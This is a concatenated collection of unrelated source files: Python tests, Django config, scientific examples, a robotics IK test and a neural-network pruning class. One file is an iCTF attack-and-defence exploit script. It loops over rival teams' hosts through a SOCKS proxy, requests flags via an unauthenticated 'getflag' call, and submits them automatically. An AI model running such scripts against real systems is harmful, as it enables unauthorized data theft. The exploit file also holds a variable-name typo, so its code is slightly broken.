message_id = attr.ib()
pan_user = attr.ib()
file_path = attr.ib()
passphrase = attr.ib()
@attr.s
class ImportKeysMessage(_KeysOperation):
pass
@attr.s
class ExportKeysMessage(_KeysOperation):
pass
@attr.s
class _VerificationMessage(Message):
message_id = attr.ib()
pan_user = attr.ib()
user_id = attr.ib()
device_id = attr.ib()
@attr.s
class DeviceVerifyMessage(_VerificationMessage):
pass
@attr.s
class DeviceUnverifyMessage(_VerificationMessage):
pass
@attr.s
class DeviceBlacklistMessage(_VerificationMessage):
pass
@attr.s
class DeviceUnblacklistMessage(_VerificationMessage):
pass
@attr.s
class SasMessage(_VerificationMessage):
pass
@attr.s
class StartSasMessage(SasMessage):
pass
@attr.s
class CancelSasMessage(SasMessage):
pass
@attr.s
class ConfirmSasMessage(SasMessage):
pass
@attr.s
class AcceptSasMessage(SasMessage):
pass
@attr.s
class _SasSignal:
pan_user = attr.ib()
user_id = attr.ib()
device_id = attr.ib()
transaction_id = attr.ib()
@attr.s
class InviteSasSignal(_SasSignal):
pass
@attr.s
class ShowSasSignal(_SasSignal):
emoji = attr.ib()
@attr.s
class SasDoneSignal(_SasSignal):
pass
|
tests/test_utils.py | JARVIS-AI/EulerPy | 210 | 12653687 | <reponame>JARVIS-AI/EulerPy<gh_stars>100-1000
# -*- coding: utf-8 -*-
import os
import json
import textwrap
import unittest
from EulerPy.problem import Problem
from EulerPy.utils import human_time
EULER_DIR = os.path.dirname(os.path.dirname(__file__))
EULER_DATA = os.path.join(EULER_DIR, 'EulerPy', 'data')
class EulerPyUtils(unittest.TestCase):
def test_problem_format(self):
"""
Ensure each parsed problem only contains one problem (that one problem
does not "bleed" into the next one due to an issue with line breaks)
"""
# Determine largest problem in problems.txt
problems_file = os.path.join(EULER_DATA, 'problems.txt')
with open(problems_file) as f:
for line in f:
if line.startswith('Problem '):
largest_problem = line.split(' ')[1]
for problem in range(1, int(largest_problem) + 1):
problemText = Problem(problem).text
msg = "Error encountered when parsing problem {}.".format(problem)
self.assertFalse('========='in problemText, msg=msg)
self.assertFalse('\n\n\n' in problemText, msg=msg)
def test_expected_problem(self):
"""Check that problem #1 returns the correct problem text"""
problem_one = textwrap.dedent(
"""
If we list all the natural numbers below 10 that are multiples of 3 or 5,
we get 3, 5, 6 and 9. The sum of these multiples is 23.
Find the sum of all the multiples of 3 or 5 below 1000.
"""
)
self.assertEqual(problem_one.strip(), Problem(1).text)
def test_filename_format(self):
"""Check that filenames are being formatted correctly"""
self.assertEqual(Problem(1).filename(), "001.py")
self.assertEqual(Problem(10).filename(), "010.py")
self.assertEqual(Problem(100).filename(), "100.py")
def test_time_format(self):
self.assertEqual(human_time(100000), '1d 3h 46m 40s')
def test_problem_resources(self):
"""Ensure resources in `/data` match `resources.json`"""
resources_path = os.path.join(EULER_DATA, 'resources')
def _resource_check(filename, seen_files):
path = os.path.join(resources_path, filename)
# Check that resource exists in `/data`
self.assertTrue(os.path.isfile(path),
'%s does not exist.' % filename)
# Add resource to set `seen_files`
seen_files.add(filename)
with open(os.path.join(EULER_DATA, 'resources.json')) as f:
resource_dict = json.load(f)
seen_files = set()
for item in (v for k, v in resource_dict.items()):
if isinstance(item, list):
for subitem in item:
_resource_check(subitem, seen_files)
else:
_resource_check(item, seen_files)
self.assertEqual(seen_files, set(os.listdir(resources_path)))
|
tests/modules/contrib/test_yubikey.py | spxtr/bumblebee-status | 1,089 | 12653729 | <filename>tests/modules/contrib/test_yubikey.py
import pytest
pytest.importorskip("yubico")
def test_load_module():
__import__("modules.contrib.yubikey")
|
lib/django-1.5/django/contrib/auth/tests/utils.py | MiCHiLU/google_appengine_sdk | 790 | 12653756 | <reponame>MiCHiLU/google_appengine_sdk
from django.conf import settings
from django.utils.unittest import skipIf
def skipIfCustomUser(test_func):
"""
Skip a test if a custom user model is in use.
"""
return skipIf(settings.AUTH_USER_MODEL != 'auth.User', 'Custom user model in use')(test_func)
|
rpython/jit/metainterp/test/test_pyjitpl.py | nanjekyejoannah/pypy | 381 | 12653771 |
# some unit tests for the bytecode decoding
import py
from rpython.jit.metainterp import pyjitpl
from rpython.jit.metainterp import jitprof
from rpython.jit.metainterp.history import ConstInt
from rpython.jit.metainterp.history import History, IntFrontendOp
from rpython.jit.metainterp.resoperation import ResOperation, rop, InputArgInt
from rpython.jit.metainterp.optimizeopt.util import equaloplists
from rpython.jit.codewriter.jitcode import JitCode
def test_portal_trace_positions():
py.test.skip("bleh, too direct test, rewrite or kill")
class jitdriver_sd:
index = 0
class warmstate:
@staticmethod
def get_unique_id(*args):
return 0
class jitdriver:
is_recursive = True
jitcode = JitCode("f")
jitcode.setup(None)
portal = JitCode("portal")
portal.jitdriver_sd = jitdriver_sd
portal.setup(None)
class FakeStaticData:
cpu = None
warmstate = None
warmrunnerdesc = None
mainjitcode = portal
metainterp = pyjitpl.MetaInterp(FakeStaticData(), FakeStaticData())
metainterp.framestack = []
class FakeHistory:
operations = []
@staticmethod
def record(*args):
pass
history = metainterp.history = FakeHistory()
metainterp.newframe(portal, "green1")
history.operations.append(1)
metainterp.newframe(jitcode)
history.operations.append(2)
metainterp.newframe(portal, "green2")
history.operations.append(3)
metainterp.popframe()
history.operations.append(4)
metainterp.popframe()
history.operations.append(5)
metainterp.popframe()
history.operations.append(6)
assert metainterp.portal_trace_positions == [("green1", 0), ("green2", 2),
(None, 3), (None, 5)]
assert metainterp.find_biggest_function() == "green1"
metainterp.newframe(portal, "green3")
history.operations.append(7)
metainterp.newframe(jitcode)
history.operations.append(8)
assert metainterp.portal_trace_positions == [("green1", 0), ("green2", 2),
(None, 3), (None, 5), ("green3", 6)]
assert metainterp.find_biggest_function() == "green1"
history.operations.extend([9, 10, 11, 12])
assert metainterp.find_biggest_function() == "green3"
def test_remove_consts_and_duplicates():
class FakeStaticData:
cpu = None
all_descrs = []
warmrunnerdesc = None
def is_another_box_like(box, referencebox):
assert box is not referencebox
assert box.type == referencebox.type
assert box.getint() == referencebox.getint()
return True
metainterp = pyjitpl.MetaInterp(FakeStaticData(), None)
metainterp.history = History()
b1 = IntFrontendOp(1)
b1.setint(1)
b2 = IntFrontendOp(2)
b2.setint(2)
c3 = ConstInt(3)
boxes = [b1, b2, b1, c3]
dup = {}
metainterp.history.set_inputargs([b1, b2], FakeStaticData())
metainterp.remove_consts_and_duplicates(boxes, 4, dup)
assert boxes[0] is b1
assert boxes[1] is b2
assert is_another_box_like(boxes[2], b1)
assert is_another_box_like(boxes[3], c3)
inp, operations = metainterp.history.trace.unpack()
remap = dict(zip([b1, b2], inp))
assert equaloplists(operations, [
ResOperation(rop.SAME_AS_I, [b1]),
ResOperation(rop.SAME_AS_I, [c3]),
], remap=remap)
assert dup == {b1: None, b2: None}
#
def test_get_name_from_address():
class FakeMetaInterpSd(pyjitpl.MetaInterpStaticData):
def __init__(self):
pass
metainterp_sd = FakeMetaInterpSd()
metainterp_sd.setup_list_of_addr2name([(123, 'a'), (456, 'b')])
assert metainterp_sd.get_name_from_address(123) == 'a'
assert metainterp_sd.get_name_from_address(456) == 'b'
assert metainterp_sd.get_name_from_address(789) == ''
|
backend/config/urls.py | FroggyTaipei/froggy-service | 174 | 12653775 | from django.conf.urls.static import static
from django.conf import settings
from django.urls import path
from django.contrib import admin
from django.conf.urls import include
from rest_framework import permissions
from drf_yasg.views import get_schema_view
from drf_yasg import openapi
from config.api import api
from .site import DashboardSite
admin.site = DashboardSite()
admin.sites.site = admin.site
admin.autodiscover()
schema_view = get_schema_view(
openapi.Info(
title="Froggy's Service API",
default_version='v1',
contact=openapi.Contact(email=settings.SERVER_EMAIL),
license=openapi.License(name="MIT License"),
),
url=settings.DOMAIN,
public=False,
permission_classes=(permissions.AllowAny,),
)
urlpatterns = [
# All Kubernetes services must serve a 200 page at '/', set admin page as index
path('', admin.site.urls, name='admin'),
path('api/', include(api.urls)),
path('api-auth/', include('rest_framework.urls', namespace='rest_framework')),
path('api/swagger/', schema_view.with_ui('swagger', cache_timeout=0), name='schema-swagger'),
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
urlpatterns[0] = path('admin/', admin.site.urls, name='admin')
|
nodes/0.7.x/python/Element.Host.py | jdehotin/Clockworkfordynamo | 147 | 12653788 | <reponame>jdehotin/Clockworkfordynamo<gh_stars>100-1000
import clr
clr.AddReference('RevitAPI')
from Autodesk.Revit.DB import *
clr.AddReference("RevitNodes")
import Revit
clr.ImportExtensions(Revit.Elements)
clr.AddReference("RevitServices")
import RevitServices
from RevitServices.Persistence import DocumentManager
doc = DocumentManager.Instance.CurrentDBDocument
faminsts = UnwrapElement(IN[0])
elementlist = list()
for item in faminsts:
try:
elementlist.append(item.Host.ToDSType(True))
except:
# if that doesn't work, maybe it's a WallSweep
try:
hostidlist = list()
for host in item.GetHostIds():
hostidlist.append(doc.GetElement(host).ToDSType(True))
elementlist.append(hostidlist)
except:
elementlist.append(list())
OUT = elementlist |
kansha/alembic/versions/1bd634091036_add_display_week_numbers.py | AnomalistDesignLLC/kansha | 161 | 12653796 | <filename>kansha/alembic/versions/1bd634091036_add_display_week_numbers.py<gh_stars>100-1000
"""add display week numbers
Revision ID: 1bd634091036
Revises: <PASSWORD>
Create Date: 2015-09-15 11:51:46.739150
"""
# revision identifiers, used by Alembic.
revision = '1bd634091036'
down_revision = '<PASSWORD>'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.add_column('user', sa.Column('display_week_numbers', sa.Boolean))
def downgrade():
op.drop_column('user', 'display_week_numbers')
|
Patterns/MACD.py | yanding/Stock-Analysis | 357 | 12653803 | '''
Author: <NAME>
Date: 8/17/2018
Description: Creates a dataframe with moving averages and MACD oscillator
'''
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from datetime import datetime, timedelta
from iexfinance import get_historical_data
moving_avg1 = 10
moving_avg2 = 20
ticker = "BABA"
now = datetime.now()
start = now - timedelta(days=90)
df = get_historical_data(ticker, start=start, end=now, output_format='pandas')
def macd(dat):
dat['10dma'] = dat['close'].rolling(window=moving_avg1, min_periods=1).mean()
dat['20dma'] = dat['close'].rolling(window=moving_avg2, min_periods=1).mean()
return dat
def add_macd(df):
df = macd(df)
df['position'] = 0
df['position'][moving_avg1:] = np.where(df['10dma'][moving_avg1:] >= df['20dma'][moving_avg1:], 1, 0)
df['signals'] = df['position'].diff()
df['oscillator'] = df['10dma'] - df['20dma']
return df
df = add_macd(df)
# print(df)
print(df.loc[df['signals'] == 1])
print(df.loc[df['signals'] == -1])
|
client/python/tests/test_single_packet.py | TimeToogo/fire-and-forget-http | 747 | 12653826 | <reponame>TimeToogo/fire-and-forget-http<gh_stars>100-1000
from ff_client import FfClient, FfConfig, FfRequest
import unittest
import logging
import time
class TestFfClientSinglePacket(unittest.TestCase):
def test_create_request_packets_for_get_request(self):
client = FfClient(FfConfig(ip_address='127.0.0.1',
port=8080, log_level=logging.DEBUG))
http_request = "GET / HTTP/1.1\nHost: google.com.au\n\n"
packets = client.create_request_packets(http_request, https=False)
payload_options_length = 11 + 3 # Timstamp option + EOL option
self.assertEqual(1, len(packets))
packet1_buff = packets[0].payload
packet1_len = packets[0].length
ptr = 0
self.assertEqual(73, packet1_len)
# Request version
self.assertEqual(FfRequest.Version.V1,
packet1_buff[ptr] << 8 | packet1_buff[ptr + 1])
ptr += 2
# Request ID
self.assertNotEqual(0, (
packet1_buff[ptr] << 56
| packet1_buff[ptr + 1] << 48
| packet1_buff[ptr + 2] << 40
| packet1_buff[ptr + 3] << 32
| packet1_buff[ptr + 4] << 24
| packet1_buff[ptr + 5] << 16
| packet1_buff[ptr + 6] << 8
| packet1_buff[ptr + 7]
))
ptr += 8
# Total length
self.assertEqual(len(http_request) + payload_options_length, (
packet1_buff[ptr] << 24
| packet1_buff[ptr + 1] << 16
| packet1_buff[ptr + 2] << 8
| packet1_buff[ptr + 3]
))
ptr += 4
# Chunk offset
self.assertEqual(0, (
packet1_buff[ptr] << 24
| packet1_buff[ptr + 1] << 16
| packet1_buff[ptr + 2] << 8
| packet1_buff[ptr + 3]
))
ptr += 4
# Chunk length
self.assertEqual(len(http_request) + payload_options_length, (
packet1_buff[ptr] << 8
| packet1_buff[ptr + 1]
))
ptr += 2
# Break option type
self.assertEqual(FfRequest.Option.Type.BREAK, packet1_buff[ptr])
ptr += 1
# Break option length
self.assertEqual(0, packet1_buff[ptr] << 16 | packet1_buff[ptr + 1])
ptr += 2
# Timestamp option type
self.assertEqual(FfRequest.Option.Type.TIMESTAMP, packet1_buff[ptr])
ptr += 1
# Timestamp option length
self.assertEqual(8, packet1_buff[ptr] << 16 | packet1_buff[ptr + 1])
ptr += 2
# Timestamp option value
self.assertAlmostEqual(
time.time(),
packet1_buff[ptr] << 56
| packet1_buff[ptr + 1] << 48
| packet1_buff[ptr + 2] << 40
| packet1_buff[ptr + 3] << 32
| packet1_buff[ptr + 4] << 24
| packet1_buff[ptr + 5] << 16
| packet1_buff[ptr + 6] << 8
| packet1_buff[ptr + 7],
delta = 5
)
ptr += 8
# EOL option type
self.assertEqual(FfRequest.Option.Type.EOL, packet1_buff[ptr])
ptr += 1
# EOL option length
self.assertEqual(0, packet1_buff[ptr] << 16 | packet1_buff[ptr + 1])
ptr += 2
# Payload
self.assertEqual(bytearray(http_request.encode('utf8')),
packet1_buff[ptr:packet1_len])
|
neo/Prompt/PromptPrinter.py | volekerb/neo-python | 387 | 12653833 | <gh_stars>100-1000
from prompt_toolkit import print_formatted_text
from prompt_toolkit.formatted_text import FormattedText
from prompt_toolkit.styles import Style
from neo.UserPreferences import preferences
import os
import sys
token_style = Style.from_dict({
"command": preferences.token_style['Command'],
"neo": preferences.token_style['Neo'],
"default": preferences.token_style['Default'],
"number": preferences.token_style['Number'],
})
class PromptPrinter():
def __init__(self):
self.printer = self._internal_prompt_print
def reset_printer(self):
self.printer = self._internal_prompt_print
def _internal_prompt_print(self, *args, **kwargs):
kwargs['sep'] = kwargs.pop('sep', ' ')
kwargs['end'] = kwargs.pop('end', '\n')
kwargs['file'] = kwargs.pop('file', sys.stdout)
kwargs['style'] = token_style
frags = []
for a in args:
if isinstance(a, FormattedText):
frags.append(a)
else:
frags.append(FormattedText([("class:command", str(a))]))
print_formatted_text(*frags, **kwargs)
def print(self, *args, **kwargs):
if 'NEOPYTHON_UNITTEST' in os.environ:
print(*args, **kwargs)
else:
self.printer(*args, **kwargs)
pp = PromptPrinter()
def prompt_print(*args, **kwargs):
pp.print(*args, **kwargs)
|
iCTF/2018/fantasticiot/exploit.py | Per5ianCat/ctf-writeups | 476 | 12653842 | #!/usr/bin/env python2
# This code was written 10 hours before the competition, yikes
# Any bugs are your problem
import socks # pip install PySocks
import socket
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, '127.0.0.1', 4444)
socket.socket = socks.socksocket
from pwn import * # pip install pwntools
from swpag_client import Team # pip install swpag_client
import time
import traceback
import json
import sys
team = Team(None, "xxxxxxxxxxxxxxxxxxx")
def team_ip(team_host):
# 172.31.129.1 (team1) ... 172.31.129.254 (team254) ... 172.31.130.1 (team255) ...
team_number = int(team_host[4:])
minor = ((team_number - 1) % 254) + 1
major = (team_number / 255) + 129
return '172.31.{major}.{minor}'.format(major=major, minor=minor)
services = team.get_service_list()
service_flag_ids = dict()
while True:
for service in services:
if service['service_name'] != 'fantasticiot':
continue
print("Going to attack", service['service_name'])
if service['service_name'] not in service_flag_ids:
service_flag_ids[service['service_name']] = set()
targets = team.get_targets(service['service_id'])
flag_list = []
for target in targets:
flag_id = target['flag_id']
ip = team_ip(target['hostname'])
port = target['port']
if flag_id not in service_flag_ids[service['service_name']]:
try:
coinn = remote(ip, port, timeout=1)
# exploitation happens here
conn.sendline('{"service": "flag", "op": "getflag", "id": "%s", "token": ""}' % flag_id)
flag = json.loads(conn.recv().strip())['flag']
conn.close()
flag_list.append(flag)
print("HACKED")
except Exception as e:
print("Error connecting to", target['team_name'], target['hostname'], ip, port)
print(e)
service_flag_ids[service['service_name']].add(flag_id)
result = team.submit_flag(flag_list)
print result
time.sleep(10) # DOS is against the rules
|
examples/scripts/example24.py | Alehud/QuSpin | 195 | 12653845 | <gh_stars>100-1000
from __future__ import print_function, division
#
import sys,os
os.environ['KMP_DUPLICATE_LIB_OK']='True' # uncomment this line if omp error occurs on OSX for python 3
os.environ['OMP_NUM_THREADS']='1' # set number of OpenMP threads to run in parallel
os.environ['MKL_NUM_THREADS']='1' # set number of MKL threads to run in parallel
#
quspin_path = os.path.join(os.getcwd(),"../../")
sys.path.insert(0,quspin_path)
################################################################################
# example 24 #
# This example shows how to use the `user_basis` to define Majorana operators. #
################################################################################
from quspin.operators import hamiltonian # Hamiltonians and operators
from quspin.basis import spinless_fermion_basis_1d # Hilbert space fermion basis_1d
from quspin.basis.user import user_basis # Hilbert space user basis
from quspin.basis.user import next_state_sig_32,op_sig_32,map_sig_32,count_particles_sig_32 # user basis data types signatures
from numba import carray,cfunc,jit # numba helper functions
from numba import uint32,int32 # numba data types
import numpy as np
from scipy.special import comb
np.set_printoptions(suppress='True', precision=6)
#
N=6 # lattice sites
#
############ create soinless fermion user basis object #############
#
@jit(uint32(uint32,uint32),locals=dict(f_count=uint32,),nopython=True,nogil=True)
def _count_particles_32(state,site_ind):
# auxiliary function to count number of fermions, i.e. 1's in bit configuration of the state, up to site site_ind
# CAUTION: 32-bit integers code only!
f_count = state & ((0x7FFFFFFF) >> (31 - site_ind));
f_count = f_count - ((f_count >> 1) & 0x55555555);
f_count = (f_count & 0x33333333) + ((f_count >> 2) & 0x33333333);
return (((f_count + (f_count >> 4)) & 0x0F0F0F0F) * 0x01010101) >> 24
#
@cfunc(op_sig_32,
locals=dict(s=int32,sign=int32,n=int32,b=uint32,f_count=uint32), )
def op(op_struct_ptr,op_str,site_ind,N,args):
# using struct pointer to pass op_struct_ptr back to C++ see numba Records
op_struct = carray(op_struct_ptr,1)[0]
err = 0
#
site_ind = N - site_ind - 1 # convention for QuSpin for mapping from bits to sites.
#####
f_count = _count_particles_32(op_struct.state,site_ind)
#####
sign = -1 if f_count&1 else 1
n = (op_struct.state>>site_ind)&1 # either 0 or 1
b = (1<<site_ind)
#
if op_str==120: # "x" is integer value 120 = ord("x")
op_struct.state ^= b
op_struct.matrix_ele *= sign
elif op_str==121: # "y" is integer value 120 = ord("y")
op_struct.state ^= b
op_struct.matrix_ele *= -1.0j*sign*((n<<1)-1)
elif op_str==43: # "+" is integer value 43 = ord("+")
op_struct.matrix_ele *= (0.0 if n else sign)
op_struct.state ^= b # create fermion
elif op_str==45: # "-" is integer value 45 = ord("-")
op_struct.matrix_ele *= (sign if n else 0.0)
op_struct.state ^= b # create fermion
elif op_str==110: # "n" is integer value 110 = ord("n")
op_struct.matrix_ele *= n
elif op_str==73: # "I" is integer value 73 = ord("I")
pass
else:
op_struct.matrix_ele = 0
err = -1
#
return err
op_args=np.array([],dtype=np.uint32)
#
###### define symmetry maps
#
@cfunc(map_sig_32,
locals=dict(shift=uint32,xmax=uint32,x1=uint32,x2=uint32,period=int32,l=int32,f_count1=int32,f_count2=int32) )
def translation(x,N,sign_ptr,args):
""" works for all system sizes N. """
shift = args[0] # translate state by shift sites
period = N # periodicity/cyclicity of translation
xmax = args[1]
#
l = (shift+period)%period
x1 = (x >> (period - l))
x2 = ((x << l) & xmax)
#
#####
# count number of fermions, i.e. 1's in bit configuration of x1
f_count1 = _count_particles_32(x1,period)
# count number of fermions, i.e. 1's in bit configuration of x2
f_count2 = _count_particles_32(x2,period)
#####
# compute fermion sign
sign_ptr[0] *= (-1 if ((f_count1&1)&(f_count2&1)&1) else 1)
#
return (x2 | x1)
T_args=np.array([1,(1<<N)-1],dtype=np.uint32)
#
@cfunc(map_sig_32,
locals=dict(out=uint32,s=uint32,f_count=int32) )
def parity(x,N,sign_ptr,args):
""" works for all system sizes N. """
out = 0
s = args[0]
#
#####
# count number of fermions, i.e. 1's in bit configuration of the state
f_count = _count_particles_32(x,N)
#####
sign_ptr[0] *= (-1 if ((f_count&2) and 1) else 1)
#
out ^= (x&1)
x >>= 1
while(x):
out <<= 1
out ^= (x&1)
x >>= 1
s -= 1
#
out <<= s
return out
P_args=np.array([N-1],dtype=np.uint32)
#
###### construct user_basis
# define anti-commuting bits -- fermion signs on the integer bits (not sites!) that represent a fermion degree of freedom
noncommuting_bits = [(np.arange(N),-1)] # fermion signs are counted w.r.t. the shift operator <<
# define maps dict
maps = dict(T_block=(translation,N,0,T_args), P_block=(parity,2,0,P_args), )
#maps = dict(P_block=(parity,2,0,P_args), )
#maps = dict(T_block=(translation,N,0,T_args) )
op_dict = dict(op=op,op_args=op_args)
# create user basiss
basis = user_basis(np.uint32,N,op_dict,allowed_ops=set("xy+-nI"),sps=2,noncommuting_bits=noncommuting_bits,**maps)
#
#
print(basis)
#
############ create and compare Hamiltonians #############
#
##### Hamiltonian in using Majoranas
#
J=-np.sqrt(2.0) # hoppping
U=+1.0 # nn interaction
#
hop_term_p=[[+0.5j*J,j,(j+1)%N] for j in range(N)]
hop_term_m=[[-0.5j*J,j,(j+1)%N] for j in range(N)]
density_term=[[+0.5j*U,j,j] for j in range(N)]
int_term=[[-0.25*U,j,j,(j+1)%N,(j+1)%N] for j in range(N)]
id_term=[[0.25*U,j] for j in range(N)]
#
static=[['xy',hop_term_p],['yx',hop_term_m], # kinetic energy
['I',id_term],['xy',density_term],['xyxy',int_term], # nn interaction energy
]
dynamic=[]
#
no_checks=dict(check_symm=False, check_pcon=False, check_herm=False)
H_majorana=hamiltonian(static,[],basis=basis,dtype=np.float64,**no_checks)
#
#
##### Hamiltonian using complex fermions
#
#
hopping_pm=[[+J,j,(j+1)%N] for j in range(N)]
hopping_mp=[[-J,j,(j+1)%N] for j in range(N)]
nn_int=[[U,j,(j+1)%N] for j in range(N)]
#
static=[["+-",hopping_pm],["-+",hopping_mp],["nn",nn_int]]
dynamic=[]
#
no_checks=dict(check_symm=False, check_pcon=False, check_herm=False)
H=hamiltonian(static,[],basis=basis,dtype=np.float64,**no_checks)
print(H.toarray())
print()
print(H_majorana.toarray())
print()
print(np.linalg.norm((H-H_majorana).toarray())) |
tests/Wrist_IK_loop_test.py | mdecourse/IKBT | 129 | 12653868 | <reponame>mdecourse/IKBT
#!/usr/bin/python
# Python inverse kinematic equations for Wrist
# This test performs the following:
#
# 1) Generate a reachable 4x4 pose
# 2) run the generated IK Python code for "Wrist" robot
# 3) take resulting list of joint-solutions and put them back into
# forward kinematics
# 4) compare the generated 4x4 matrices to the original pose
#
# Running instructions:
#
# > cd IKBT/
# > pyton -m tests.Wrist_IK_loop_test
#
# final results for each solution are error -- should be very small
#
#
import numpy as np
from math import sqrt
from math import atan2
from math import cos
from math import sin
from ikbtbasics.pykinsym import *
from ikbtfunctions.helperfunctions import *
from ikbtbasics.kin_cl import *
from ikbtbasics.ik_classes import * # special classes for Inverse kinematics in sympy
from ikbtfunctions.ik_robots import *
pi = np.pi
# Declare the parameters
# Code to solve the unknowns
def ikin_Wrist(T):
if(T.shape != (4,4)):
print("bad input to "+funcname)
quit()
#define the input vars
r_11 = T[0,0]
r_12 = T[0,1]
r_13 = T[0,2]
r_21 = T[1,0]
r_22 = T[1,1]
r_23 = T[1,2]
r_31 = T[2,0]
r_32 = T[2,1]
r_33 = T[2,2]
Px = T[0,3]
Py = T[1,3]
Pz = T[2,3]
#
# Caution: Generated code is not yet validated
#
solvable_pose = True
#Variable: A
As1 = atan2(r_21, r_11)
As2 = atan2(-r_21, -r_11)
#Variable: B
Bs2 = atan2(-r_31, r_11/cos(As2))
Bs1 = atan2(-r_31, r_11/cos(As1))
#Variable: C
Cs2 = atan2(r_32/cos(Bs1), r_33/cos(Bs1))
Cs1 = atan2(r_32/cos(Bs2), r_33/cos(Bs2))
##################################
#
#package the solutions into a list for each set
#
###################################
solution_list = []
#(note trailing commas allowed in python
solution_list.append( [ As1, Bs1, Cs2, ] )
#(note trailing commas allowed in python
solution_list.append( [ As2, Bs2, Cs1, ] )
if(solvable_pose):
return(solution_list)
else:
return(False)
#
# TEST CODE
#
if __name__ == "__main__":
# 4x4 transforms which are pure rotations
def RotX4_N(t):
return(np.matrix([
[1, 0, 0, 0],
[0, np.cos(t), -np.sin(t), 0],
[0, np.sin(t), np.cos(t), 0],
[0,0,0,1.0]
]))
def RotY4_N(t):
return(np.matrix([
[ np.cos(t), 0, np.sin(t), 0],
[0, 1, 0 , 0],
[-np.sin(t), 0, np.cos(t), 0],
[0,0,0,1]
]))
def RotZ4_N(t):
return(np.matrix([
[ np.cos(t), -np.sin(t), 0, 0],
[ np.sin(t), np.cos(t), 0, 0],
[ 0, 0, 1, 0],
[0,0,0,1]
]))
px = 0.2 # desired EE position
py = 0.3
pz = 0.6
th = np.pi/7 # just a random angle
# generate a 4x4 pose to test IK
T1 = RotX4_N(th) * RotY4_N(2*th) # combine two rotations
T1[0,3] = px
T1[1,3] = py
T1[2,3] = pz
# try the Puma IK
sol_list = ikin_Wrist(T1)
i = 0
for sol in sol_list:
print('')
print('Solution ', i)
i+=1
print(sol)
#########3 try to plug back into FK model
robot = 'Wrist'
# Get the robot model
[dh, vv, params, pvals, unknowns] = robot_params(robot) # see ik_robots.py
#
# Set up robot equations for further solution by BT
#
# Check for a pickle file of pre-computed Mech object. If the pickle
# file is not there, compute the kinematic equations
testing = False
[M, R, unknowns] = kinematics_pickle(robot, dh, params, pvals, vv, unknowns, testing)
print('GOT HERE: robot name: ', R.name)
R.name = robot
R.params = params
## check the pickle in case DH params were changed
dhp = M.DH
check_the_pickle(dhp, dh) # check that two mechanisms have identical DH params
sp.var('A B C')
i=0
# for each solution, compare FK(sol) with T01
for sol in sol_list:
pose = {A : sol[0], B : sol[1], C : sol[2]}
T2 = forward_kinematics_N(M, pose, M.pvals)
maxe = -9999999.99
print('- - - - - ')
print(T2-T1)
print('- - - - - ')
for k in [0,1,2,3]:
for j in [0,1,2]:
e = T1[k,j]-T2[k,j]
#print '<<',e,'>>'
if np.abs(e) > maxe:
maxe = np.abs(e)
print('Solution ',i,': ', maxe)
i += 1
|
legr.py | cmu-enyac/LeGR | 106 | 12653875 | import os
import time
import torch
import queue
import argparse
import numpy as np
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from utils.drivers import train, test, get_dataloader
from model.MobileNetV2 import MobileNetV2, InvertedResidual
from pruner.fp_mbnetv2 import FilterPrunerMBNetV2
from pruner.fp_resnet import FilterPrunerResNet
class LeGR:
def __init__(self, dataset, datapath, model, pruner, rank_type='l2_weight', batch_size=32, lr=1e-3, safeguard=0, global_random_rank=False, lub='', device='cuda'):
self.device = device
self.sample_for_ranking = 1 if rank_type in ['l1_weight', 'l2_weight', 'l2_bn', 'l1_bn', 'l2_bn_param'] else 5000
self.safeguard = safeguard
self.lub = lub
self.lr = lr
self.img_size = 32 if 'CIFAR' in args.dataset else 224
self.batch_size = batch_size
self.rank_type = rank_type
self.train_loader, self.val_loader, self.test_loader = get_dataloader(self.img_size, dataset, datapath, batch_size, args.no_val)
if 'CIFAR100' in dataset:
num_classes = 100
elif 'CIFAR10' in dataset:
num_classes = 10
elif 'ImageNet' in dataset:
num_classes = 1000
elif 'CUB200' in dataset:
num_classes = 200
self.model = model
self.criterion = torch.nn.CrossEntropyLoss()
self.pruner = eval(pruner)(self.model, rank_type, num_classes, safeguard, random=global_random_rank, device=device)
self.model.train()
def learn_ranking_ea(self, name, model_desc, tau_hat, long_ft, target):
name = name
start_t = time.time()
self.pruner.reset()
self.pruner.model.eval()
self.pruner.forward(torch.zeros((1,3,self.img_size,self.img_size), device=self.device))
original_flops = self.pruner.cur_flops
original_size = self.pruner.cur_size
print('Before Pruning, FLOPs: {:.3f}M, Size: {:.3f}M'.format(original_flops/1e6, original_size/1e6))
mean_loss = []
num_layers = len(self.pruner.filter_ranks)
minimum_loss = 10
best_perturbation = None
POPULATIONS = 64
SAMPLES = 16
GENERATIONS = 400
SCALE_SIGMA = 1
MUTATE_PERCENT = 0.1
index_queue = queue.Queue(POPULATIONS)
population_loss = np.zeros(0)
population_data = []
original_dist = self.pruner.filter_ranks.copy()
original_dist_stat = {}
for k in sorted(original_dist):
a = original_dist[k].cpu().numpy()
original_dist_stat[k] = {'mean': np.mean(a), 'std': np.std(a)}
# Initialize Population
for i in range(GENERATIONS):
step_size = 1-(float(i)/(GENERATIONS*1.25))
# Perturn distribution
perturbation = []
if i == POPULATIONS-1:
for k in sorted(self.pruner.filter_ranks.keys()):
perturbation.append((1,0))
elif i < POPULATIONS-1:
for k in sorted(self.pruner.filter_ranks.keys()):
scale = np.exp(float(np.random.normal(0, SCALE_SIGMA)))
shift = float(np.random.normal(0, original_dist_stat[k]['std']))
perturbation.append((scale, shift))
else:
mean_loss.append(np.mean(population_loss))
sampled_idx = np.random.choice(POPULATIONS, SAMPLES)
sampled_loss = population_loss[sampled_idx]
winner_idx_ = np.argmin(sampled_loss)
winner_idx = sampled_idx[winner_idx_]
oldest_index = index_queue.get()
# Mutate winner
base = population_data[winner_idx]
# Perturb distribution
mnum = int(MUTATE_PERCENT * len(self.pruner.filter_ranks))
mutate_candidate = np.random.choice(len(self.pruner.filter_ranks), mnum)
for k in sorted(self.pruner.filter_ranks.keys()):
scale = 1
shift = 0
if k in mutate_candidate:
scale = np.exp(float(np.random.normal(0, SCALE_SIGMA*step_size)))
shift = float(np.random.normal(0, original_dist_stat[k]['std']))
perturbation.append((scale*base[k][0], shift+base[k][1]))
# Given affine transformations, rank and prune
self.pruner.pruning_with_transformations(original_dist, perturbation, target)
# Re-measure the pruned model in terms of FLOPs and size
self.pruner.reset()
self.pruner.model.eval()
self.pruner.forward(torch.zeros((1,3,self.img_size,self.img_size), device=self.device))
cur_flops = self.pruner.cur_flops
